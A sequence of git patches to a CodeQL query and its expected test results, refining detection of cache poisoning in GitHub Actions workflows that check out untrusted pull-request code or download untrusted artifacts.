b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected index 994beb3b74f5..2ad477a2a8bb 100644 --- a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected +++ b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected @@ -64,26 +64,34 @@ edges | .github/workflows/test20.yml:41:7:42:4 | Run Step | .github/workflows/test20.yml:42:7:43:4 | Run Step | | .github/workflows/test20.yml:42:7:43:4 | Run Step | .github/workflows/test20.yml:43:7:46:39 | Uses Step | | .github/workflows/test21.yml:20:9:26:6 | Uses Step | .github/workflows/test21.yml:26:9:29:2 | Run Step | +| .github/workflows/test22.yml:13:9:14:6 | Uses Step | .github/workflows/test22.yml:14:9:18:6 | Uses Step | +| .github/workflows/test22.yml:14:9:18:6 | Uses Step | .github/workflows/test22.yml:18:9:25:6 | Uses Step: cache-pip | +| .github/workflows/test22.yml:18:9:25:6 | Uses Step: cache-pip | .github/workflows/test22.yml:25:9:30:6 | Uses Step | +| .github/workflows/test22.yml:25:9:30:6 | Uses Step | .github/workflows/test22.yml:30:9:35:36 | Uses Step | +| .github/workflows/test23.yml:13:9:14:6 | Uses Step | .github/workflows/test23.yml:14:9:18:6 | Uses Step | +| .github/workflows/test23.yml:14:9:18:6 | Uses Step | .github/workflows/test23.yml:18:9:25:6 | Uses Step: cache-pip | +| .github/workflows/test23.yml:18:9:25:6 | Uses Step: cache-pip | .github/workflows/test23.yml:25:9:30:6 | Uses Step | +| .github/workflows/test23.yml:25:9:30:6 | Uses Step | .github/workflows/test23.yml:30:9:35:36 | Uses Step | #select -| .github/workflows/poc3.yml:33:7:38:4 | Uses Step | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:33:7:38:4 | Uses Step | Potential cache poisoning in the context of the default branch | -| .github/workflows/poc3.yml:38:7:40:4 | Run Step | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:38:7:40:4 | Run Step | Potential cache poisoning in the context of the default branch | -| .github/workflows/poc3.yml:41:7:42:4 | Run Step | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:41:7:42:4 | Run Step | Potential cache poisoning in the context of the default branch | -| .github/workflows/poc3.yml:42:7:43:4 | Run Step | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | Potential cache poisoning in the context of the default branch | -| .github/workflows/poc.yml:38:9:43:6 | Uses Step | .github/workflows/poc.yml:30:9:36:6 | Uses Step | .github/workflows/poc.yml:38:9:43:6 | Uses Step | Potential cache poisoning in the context of the default branch | -| .github/workflows/test1.yml:18:9:22:6 | Uses Step | .github/workflows/test1.yml:13:9:18:6 | Uses Step | .github/workflows/test1.yml:18:9:22:6 | Uses Step | Potential cache poisoning in the context of the default branch | -| .github/workflows/test2.yml:14:9:18:6 | Uses Step | .github/workflows/test2.yml:11:9:14:6 | Uses Step | .github/workflows/test2.yml:14:9:18:6 | Uses Step | Potential cache poisoning in the context of the default branch | -| .github/workflows/test3.yml:14:9:22:6 | Uses Step | .github/workflows/test3.yml:11:9:14:6 | Uses Step | .github/workflows/test3.yml:14:9:22:6 | Uses Step | Potential cache poisoning in the context of the default branch | -| .github/workflows/test6.yml:13:9:17:6 | Uses Step | .github/workflows/test6.yml:10:9:13:6 | Uses Step | .github/workflows/test6.yml:13:9:17:6 | Uses Step | Potential cache poisoning in the context of the default branch | -| .github/workflows/test7.yml:13:9:16:6 | Uses Step | .github/workflows/test7.yml:10:9:13:6 | Uses Step | .github/workflows/test7.yml:13:9:16:6 | Uses Step | Potential cache poisoning in the context of the default branch | -| .github/workflows/test8.yml:15:9:17:2 | Run Step | .github/workflows/test8.yml:12:9:15:6 | Uses Step | .github/workflows/test8.yml:15:9:17:2 | Run Step | Potential cache poisoning in the context of the default branch | -| .github/workflows/test8.yml:26:9:28:2 | Uses Step | .github/workflows/test8.yml:23:9:26:6 | Uses Step | .github/workflows/test8.yml:26:9:28:2 | Uses Step | Potential cache poisoning in the context of the default branch | -| .github/workflows/test8.yml:37:9:37:75 | Run Step | .github/workflows/test8.yml:34:9:37:6 | Uses Step | .github/workflows/test8.yml:37:9:37:75 | Run Step | Potential cache poisoning in the context of the default branch | -| .github/workflows/test11.yml:19:9:23:6 | Uses Step | .github/workflows/test11.yml:14:9:19:6 | Uses Step | .github/workflows/test11.yml:19:9:23:6 | Uses Step | Potential cache poisoning in the context of the default branch | -| .github/workflows/test15.yml:17:9:21:6 | Uses Step | .github/workflows/test15.yml:14:9:17:6 | Uses Step | .github/workflows/test15.yml:17:9:21:6 | Uses Step | Potential cache poisoning in the context of the default branch | -| .github/workflows/test16.yml:17:9:21:6 | Uses Step | .github/workflows/test16.yml:14:9:17:6 | Uses Step | .github/workflows/test16.yml:17:9:21:6 | Uses Step | Potential cache poisoning in the context of the default branch | -| .github/workflows/test17.yml:22:9:26:31 | Uses Step | .github/workflows/test17.yml:15:9:20:6 | Uses Step | .github/workflows/test17.yml:22:9:26:31 | Uses Step | Potential cache poisoning in the context of the default branch | -| .github/workflows/test20.yml:33:7:38:4 | Uses Step | .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:33:7:38:4 | Uses Step | Potential cache poisoning in the context of the default branch | -| .github/workflows/test20.yml:38:7:40:4 | Run Step | .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:38:7:40:4 | Run Step | Potential cache poisoning in the context of the default branch | -| .github/workflows/test20.yml:41:7:42:4 | Run Step | .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:41:7:42:4 | Run Step | Potential cache poisoning in the context of the default branch | -| .github/workflows/test20.yml:42:7:43:4 | Run Step | .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:42:7:43:4 | Run Step | Potential cache poisoning in the context of the default branch | -| .github/workflows/test21.yml:26:9:29:2 | Run Step | .github/workflows/test21.yml:20:9:26:6 | Uses Step | .github/workflows/test21.yml:26:9:29:2 | Run Step | Potential cache poisoning in the context of the default branch | +| .github/workflows/poc3.yml:33:7:38:4 | Uses Step | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:33:7:38:4 | Uses Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | +| .github/workflows/poc3.yml:38:7:40:4 | Run Step | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:38:7:40:4 | Run Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | +| .github/workflows/poc3.yml:41:7:42:4 | Run Step | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:41:7:42:4 | Run Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | +| .github/workflows/poc3.yml:42:7:43:4 | Run Step | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | +| .github/workflows/poc.yml:38:9:43:6 | Uses Step | .github/workflows/poc.yml:30:9:36:6 | Uses Step | .github/workflows/poc.yml:38:9:43:6 | Uses Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | +| .github/workflows/test1.yml:18:9:22:6 | Uses Step | .github/workflows/test1.yml:13:9:18:6 | Uses Step | .github/workflows/test1.yml:18:9:22:6 | Uses Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | +| .github/workflows/test2.yml:14:9:18:6 | Uses Step | .github/workflows/test2.yml:11:9:14:6 | Uses Step | .github/workflows/test2.yml:14:9:18:6 | Uses Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | +| .github/workflows/test3.yml:14:9:22:6 | Uses Step | .github/workflows/test3.yml:11:9:14:6 | Uses Step | .github/workflows/test3.yml:14:9:22:6 | Uses Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | +| .github/workflows/test6.yml:13:9:17:6 | Uses Step | .github/workflows/test6.yml:10:9:13:6 | Uses Step | .github/workflows/test6.yml:13:9:17:6 | Uses Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | +| .github/workflows/test7.yml:13:9:16:6 | Uses Step | .github/workflows/test7.yml:10:9:13:6 | Uses Step | .github/workflows/test7.yml:13:9:16:6 | Uses Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | +| .github/workflows/test8.yml:15:9:17:2 | Run Step | .github/workflows/test8.yml:12:9:15:6 | Uses Step | .github/workflows/test8.yml:15:9:17:2 | Run Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | +| .github/workflows/test8.yml:26:9:28:2 | Uses Step | .github/workflows/test8.yml:23:9:26:6 | Uses Step | .github/workflows/test8.yml:26:9:28:2 | Uses Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | +| .github/workflows/test8.yml:37:9:37:75 | Run Step | .github/workflows/test8.yml:34:9:37:6 | Uses Step | .github/workflows/test8.yml:37:9:37:75 | Run Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | +| .github/workflows/test11.yml:19:9:23:6 | Uses Step | .github/workflows/test11.yml:14:9:19:6 | Uses Step | .github/workflows/test11.yml:19:9:23:6 | Uses Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | +| .github/workflows/test15.yml:17:9:21:6 | Uses Step | .github/workflows/test15.yml:14:9:17:6 | Uses Step | .github/workflows/test15.yml:17:9:21:6 | Uses Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | +| .github/workflows/test16.yml:17:9:21:6 | Uses Step | .github/workflows/test16.yml:14:9:17:6 | Uses Step | .github/workflows/test16.yml:17:9:21:6 | Uses Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | +| .github/workflows/test17.yml:22:9:26:31 | Uses Step | .github/workflows/test17.yml:15:9:20:6 | Uses Step | .github/workflows/test17.yml:22:9:26:31 | Uses Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | +| .github/workflows/test20.yml:33:7:38:4 | Uses Step | .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:33:7:38:4 | Uses Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | +| .github/workflows/test20.yml:38:7:40:4 | Run Step | .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:38:7:40:4 | Run Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | +| .github/workflows/test20.yml:41:7:42:4 | Run Step | .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:41:7:42:4 | Run Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | +| .github/workflows/test20.yml:42:7:43:4 | Run Step | .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:42:7:43:4 | Run Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | +| .github/workflows/test21.yml:26:9:29:2 | Run Step | .github/workflows/test21.yml:20:9:26:6 | Uses Step | .github/workflows/test21.yml:26:9:29:2 | Run Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | From 2273aadb4bc0b80bc48eec448de0b6405a5e32ac Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 5 Aug 2024 23:47:00 +0200 Subject: [PATCH 453/707] Improve Cache Poisoning query The untrusted files path is compared with the path written to the cache to check if the cache can really be poisoned --- ql/src/Security/CWE-349/CachePoisoning.ql | 52 ++++++++++++++++++++--- 1 file changed, 45 insertions(+), 7 deletions(-) diff --git a/ql/src/Security/CWE-349/CachePoisoning.ql b/ql/src/Security/CWE-349/CachePoisoning.ql index 6609dae2b7f6..3f2bb8db472b 100644 --- a/ql/src/Security/CWE-349/CachePoisoning.ql +++ b/ql/src/Security/CWE-349/CachePoisoning.ql @@ -18,19 +18,47 @@ import codeql.actions.security.CachePoisoningQuery import codeql.actions.security.PoisonableSteps import codeql.actions.security.ControlChecks +/** + * Holds if the path cache_path is a subpath of the path untrusted_path. + */ +bindingset[cache_path, untrusted_path] +predicate controlledCachePath(string cache_path, string untrusted_path) { + exists(string normalized_cache_path, string normalized_untrusted_path | + ( + cache_path.regexpMatch("^[a-zA-Z0-9_-].*") and + normalized_cache_path = "./" + cache_path.regexpReplaceAll("/$", "") + or + normalized_cache_path = cache_path.regexpReplaceAll("/$", "") + ) and + ( + untrusted_path.regexpMatch("^[a-zA-Z0-9_-].*") and + normalized_untrusted_path = "./" + untrusted_path.regexpReplaceAll("/$", "") + or + normalized_untrusted_path = untrusted_path.regexpReplaceAll("/$", "") + ) and + normalized_cache_path.substring(0, normalized_untrusted_path.length()) = + normalized_untrusted_path + ) +} + query predicate edges(Step a, Step b) { a.getNextStep() = b } -from LocalJob j, Event e, Step artifact, Step s +from LocalJob j, Event e, Step source, Step s, string message, string path where ( - artifact instanceof PRHeadCheckoutStep or - artifact instanceof UntrustedArtifactDownloadStep + source instanceof PRHeadCheckoutStep and + message = "due to privilege checkout of untrusted code." and + path = source.(PRHeadCheckoutStep).getPath() + or + source instanceof UntrustedArtifactDownloadStep and + message = "due to downloading an untrusted artifact." and + path = source.(UntrustedArtifactDownloadStep).getPath() ) and j.getATriggerEvent() = e and // job can be triggered by an external user e.isExternallyTriggerable() and // the checkout is not controlled by an access check - not exists(ControlCheck check | check.protects(artifact, j.getATriggerEvent())) and + not exists(ControlCheck check | check.protects(source, j.getATriggerEvent())) and ( // the workflow runs in the context of the default branch runsOnDefaultBranch(e) @@ -43,19 +71,29 @@ where ) ) and // the job checkouts untrusted code from a pull request - j.getAStep() = artifact and + j.getAStep() = source and ( // the job writes to the cache // (No need to follow the checkout step as the cache writing is normally done after the job completes) j.getAStep() = s and s instanceof CacheWritingStep and + ( + // we dont know what code can be controlled by the attacker + path = "?" + or + // we dont know what files are being cached + s.(CacheWritingStep).getPath() = "?" + or + // the cache writing step reads from the path the attacker can control + not path = "?" and controlledCachePath(s.(CacheWritingStep).getPath(), path) + ) and not s instanceof PoisonableStep or // the job executes checked-out code // (The cache specific token can be leaked even for non-privileged workflows) - artifact.getAFollowingStep() = s and + source.getAFollowingStep() = s and s instanceof PoisonableStep and // excluding privileged workflows since they can be exploited in easier circumstances not j.isPrivileged() ) -select s, artifact, s, "Potential cache poisoning in the context of the default branch" +select s, source, s, "Potential cache poisoning in the context of the default branch" + message From 14f1672e740dae8beb881e5b895c73f443e5437c Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 5 Aug 2024 23:54:26 +0200 Subject: [PATCH 454/707] Fix query message --- ql/src/Security/CWE-349/CachePoisoning.ql | 2 +- .../Security/CWE-349/CachePoisoning.expected | 45 ++++++++++--------- 2 files changed, 24 insertions(+), 23 deletions(-) diff --git a/ql/src/Security/CWE-349/CachePoisoning.ql b/ql/src/Security/CWE-349/CachePoisoning.ql index 3f2bb8db472b..3807cb4b592d 100644 --- a/ql/src/Security/CWE-349/CachePoisoning.ql +++ b/ql/src/Security/CWE-349/CachePoisoning.ql @@ -96,4 +96,4 @@ where // excluding privileged workflows since they can be exploited in easier circumstances not j.isPrivileged() ) -select s, source, s, "Potential cache poisoning in the context of the default branch" + message +select s, source, s, "Potential cache poisoning in the context of the default branch " + message diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected index 2ad477a2a8bb..fdaf0cf25ad1 100644 --- a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected +++ b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected @@ -73,25 +73,26 @@ edges | .github/workflows/test23.yml:18:9:25:6 | Uses Step: cache-pip | .github/workflows/test23.yml:25:9:30:6 | Uses Step | | .github/workflows/test23.yml:25:9:30:6 | Uses Step | .github/workflows/test23.yml:30:9:35:36 | Uses Step | #select -| .github/workflows/poc3.yml:33:7:38:4 | Uses Step | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:33:7:38:4 | Uses Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | -| .github/workflows/poc3.yml:38:7:40:4 | Run Step | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:38:7:40:4 | Run Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | -| .github/workflows/poc3.yml:41:7:42:4 | Run Step | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:41:7:42:4 | Run Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | -| .github/workflows/poc3.yml:42:7:43:4 | Run Step | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | -| .github/workflows/poc.yml:38:9:43:6 | Uses Step | .github/workflows/poc.yml:30:9:36:6 | Uses Step | .github/workflows/poc.yml:38:9:43:6 | Uses Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | -| .github/workflows/test1.yml:18:9:22:6 | Uses Step | .github/workflows/test1.yml:13:9:18:6 | Uses Step | .github/workflows/test1.yml:18:9:22:6 | Uses Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | -| .github/workflows/test2.yml:14:9:18:6 | Uses Step | .github/workflows/test2.yml:11:9:14:6 | Uses Step | .github/workflows/test2.yml:14:9:18:6 | Uses Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | -| .github/workflows/test3.yml:14:9:22:6 | Uses Step | .github/workflows/test3.yml:11:9:14:6 | Uses Step | .github/workflows/test3.yml:14:9:22:6 | Uses Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | -| .github/workflows/test6.yml:13:9:17:6 | Uses Step | .github/workflows/test6.yml:10:9:13:6 | Uses Step | .github/workflows/test6.yml:13:9:17:6 | Uses Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | -| .github/workflows/test7.yml:13:9:16:6 | Uses Step | .github/workflows/test7.yml:10:9:13:6 | Uses Step | .github/workflows/test7.yml:13:9:16:6 | Uses Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | -| .github/workflows/test8.yml:15:9:17:2 | Run Step | .github/workflows/test8.yml:12:9:15:6 | Uses Step | .github/workflows/test8.yml:15:9:17:2 | Run Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | -| .github/workflows/test8.yml:26:9:28:2 | Uses Step | .github/workflows/test8.yml:23:9:26:6 | Uses Step | .github/workflows/test8.yml:26:9:28:2 | Uses Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | -| .github/workflows/test8.yml:37:9:37:75 | Run Step | .github/workflows/test8.yml:34:9:37:6 | Uses Step | .github/workflows/test8.yml:37:9:37:75 | Run Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | -| .github/workflows/test11.yml:19:9:23:6 | Uses Step | .github/workflows/test11.yml:14:9:19:6 | Uses Step | .github/workflows/test11.yml:19:9:23:6 | Uses Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | -| .github/workflows/test15.yml:17:9:21:6 | Uses Step | .github/workflows/test15.yml:14:9:17:6 | Uses Step | .github/workflows/test15.yml:17:9:21:6 | Uses Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | -| .github/workflows/test16.yml:17:9:21:6 | Uses Step | .github/workflows/test16.yml:14:9:17:6 | Uses Step | .github/workflows/test16.yml:17:9:21:6 | Uses Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | -| .github/workflows/test17.yml:22:9:26:31 | Uses Step | .github/workflows/test17.yml:15:9:20:6 | Uses Step | .github/workflows/test17.yml:22:9:26:31 | Uses Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | -| .github/workflows/test20.yml:33:7:38:4 | Uses Step | .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:33:7:38:4 | Uses Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | -| .github/workflows/test20.yml:38:7:40:4 | Run Step | .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:38:7:40:4 | Run Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | -| .github/workflows/test20.yml:41:7:42:4 | Run Step | .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:41:7:42:4 | Run Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | -| .github/workflows/test20.yml:42:7:43:4 | Run Step | .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:42:7:43:4 | Run Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | -| .github/workflows/test21.yml:26:9:29:2 | Run Step | .github/workflows/test21.yml:20:9:26:6 | Uses Step | .github/workflows/test21.yml:26:9:29:2 | Run Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | +| .github/workflows/poc3.yml:33:7:38:4 | Uses Step | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:33:7:38:4 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/poc3.yml:38:7:40:4 | Run Step | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:38:7:40:4 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/poc3.yml:41:7:42:4 | Run Step | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:41:7:42:4 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/poc3.yml:42:7:43:4 | Run Step | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/poc.yml:38:9:43:6 | Uses Step | .github/workflows/poc.yml:30:9:36:6 | Uses Step | .github/workflows/poc.yml:38:9:43:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/test1.yml:18:9:22:6 | Uses Step | .github/workflows/test1.yml:13:9:18:6 | Uses Step | .github/workflows/test1.yml:18:9:22:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/test2.yml:14:9:18:6 | Uses Step | .github/workflows/test2.yml:11:9:14:6 | Uses Step | .github/workflows/test2.yml:14:9:18:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/test3.yml:14:9:22:6 | Uses Step | .github/workflows/test3.yml:11:9:14:6 | Uses Step | .github/workflows/test3.yml:14:9:22:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/test6.yml:13:9:17:6 | Uses Step | .github/workflows/test6.yml:10:9:13:6 | Uses Step | .github/workflows/test6.yml:13:9:17:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/test7.yml:13:9:16:6 | Uses Step | .github/workflows/test7.yml:10:9:13:6 | Uses Step | .github/workflows/test7.yml:13:9:16:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/test8.yml:15:9:17:2 | Run Step | .github/workflows/test8.yml:12:9:15:6 | Uses Step | .github/workflows/test8.yml:15:9:17:2 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/test8.yml:26:9:28:2 | Uses Step | .github/workflows/test8.yml:23:9:26:6 | Uses Step | .github/workflows/test8.yml:26:9:28:2 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/test8.yml:37:9:37:75 | Run Step | .github/workflows/test8.yml:34:9:37:6 | Uses Step | .github/workflows/test8.yml:37:9:37:75 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/test11.yml:19:9:23:6 | Uses Step | .github/workflows/test11.yml:14:9:19:6 | Uses Step | .github/workflows/test11.yml:19:9:23:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/test15.yml:17:9:21:6 | Uses Step | .github/workflows/test15.yml:14:9:17:6 | Uses Step | .github/workflows/test15.yml:17:9:21:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/test16.yml:17:9:21:6 | Uses Step | .github/workflows/test16.yml:14:9:17:6 | Uses Step | .github/workflows/test16.yml:17:9:21:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/test17.yml:22:9:26:31 | Uses Step | .github/workflows/test17.yml:15:9:20:6 | Uses Step | .github/workflows/test17.yml:22:9:26:31 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/test20.yml:33:7:38:4 | Uses Step | .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:33:7:38:4 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/test20.yml:38:7:40:4 | Run Step | .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:38:7:40:4 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/test20.yml:41:7:42:4 | Run Step | .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:41:7:42:4 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/test20.yml:42:7:43:4 | Run Step | .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:42:7:43:4 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/test21.yml:26:9:29:2 | Run Step | .github/workflows/test21.yml:20:9:26:6 | Uses Step | .github/workflows/test21.yml:26:9:29:2 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/test23.yml:18:9:25:6 | Uses Step: cache-pip | .github/workflows/test23.yml:25:9:30:6 | Uses Step | .github/workflows/test23.yml:18:9:25:6 | Uses Step: cache-pip | Potential cache poisoning in the context of the default branch due to downloading an untrusted artifact. | From fbc2e1e7e807de23e871df121b71b4a41cfc3ec1 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 6 Aug 2024 10:47:12 +0200 Subject: [PATCH 455/707] Remove caching actions that cache files outside of the CWD --- .../actions/security/CachePoisoningQuery.qll | 81 +------------------ 1 file changed, 3 insertions(+), 78 deletions(-) diff --git a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll index 8c1a9ee0fd78..56002cb2b165 100644 --- a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll @@ -51,87 +51,13 @@ abstract class CacheWritingStep extends Step { class CacheActionUsesStep extends CacheWritingStep, UsesStep { CacheActionUsesStep() { this.getCallee() = "actions/cache" } - override string getPath() { - if exists(this.(UsesStep).getArgument("path")) - then result = this.(UsesStep).getArgument("path").splitAt("\n") - else result = "?" - } + override string getPath() { result = this.(UsesStep).getArgument("path").splitAt("\n") } } class CacheActionSaveUsesStep extends CacheWritingStep, UsesStep { CacheActionSaveUsesStep() { this.getCallee() = "actions/cache/save" } - override string getPath() { - if exists(this.(UsesStep).getArgument("path")) - then result = this.(UsesStep).getArgument("path").splitAt("\n") - else result = "?" - } -} - -class SetupJavaUsesStep extends CacheWritingStep, UsesStep { - SetupJavaUsesStep() { - this.getCallee() = "actions/setup-java" and - ( - exists(this.getArgument("cache")) or - exists(this.getArgument("cache-dependency-path")) - ) - } - - // TODO: Try to get the actual path being cached - override string getPath() { result = "?" } -} - -class SetupGoUsesStep extends CacheWritingStep, UsesStep { - SetupGoUsesStep() { - this.getCallee() = "actions/setup-go" and - ( - not exists(this.getArgument("cache")) - or - this.getArgument("cache") = "true" - ) - } - - // TODO: Try to get the actual path being cached - override string getPath() { result = "?" } -} - -class SetupNodeUsesStep extends CacheWritingStep, UsesStep { - SetupNodeUsesStep() { - this.getCallee() = "actions/setup-node" and - ( - exists(this.getArgument("cache")) or - exists(this.getArgument("cache-dependency-path")) - ) - } - - // TODO: Try to get the actual path being cached - override string getPath() { result = "?" } -} - -class SetupPythonUsesStep extends CacheWritingStep, UsesStep { - SetupPythonUsesStep() { - this.getCallee() = "actions/setup-python" and - ( - exists(this.getArgument("cache")) or - exists(this.getArgument("cache-dependency-path")) - ) - } - - // TODO: Try to get the actual path being cached - override string getPath() { result = "?" } -} - -class SetupDotnetUsesStep extends CacheWritingStep, UsesStep { - SetupDotnetUsesStep() { - this.getCallee() = "actions/setup-dotnet" and - ( - this.getArgument("cache") = "true" or - exists(this.getArgument("cache-dependency-path")) - ) - } - - // TODO: Try to get the actual path being cached - override string getPath() { result = "?" } + override string getPath() { result = this.(UsesStep).getArgument("path").splitAt("\n") } } class SetupRubyUsesStep extends CacheWritingStep, UsesStep { @@ -140,6 +66,5 @@ class SetupRubyUsesStep extends CacheWritingStep, 